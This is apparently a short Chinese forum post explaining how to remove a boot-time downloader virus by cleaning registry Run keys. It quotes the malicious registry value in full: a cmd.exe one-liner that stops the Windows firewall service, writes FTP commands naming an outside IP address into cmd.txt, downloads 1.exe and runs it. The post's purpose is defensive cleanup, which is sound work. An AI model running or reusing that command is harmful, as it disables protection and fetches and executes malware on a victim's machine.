开机启动 ftp 下载 1.exe 病毒,这个靠杀毒软件是杀不掉的,因为属于下载式病毒,这次杀了,下次又下载。
解决办法
进安全模式,并且不要连接网络,先杀一道病毒,把已知的病毒干掉;
检查开始菜单的所有程序的启动项,有没有恶意的启动项,若有,删除之;
下面就是比较重要的了,要删除下载病毒的功能,这个在 msconfig 等启动管理程序中是看不到的:在开始菜单中运行 regedit 启动注册表,定位到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,可以看到有一个名称为 shell 的,值类似为:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.190.217.216 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&e,这就是罪魁祸首,它把一串 ftp 命令写到 cmd.txt 的文件中,并且叫 cmd.exe 来执行这个命令,删除之,再到 system32 目录下,删除 cmd.txt 这个垃圾。完成。注意,不要删除 cmd.exe,因为这是 Windows 的系统文件,除非已经被病毒文件感染或替换。
顺便曝光一下我的 cmd.txt
另外,为了安全,建议再检查下 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 这里有没有运行 shell。
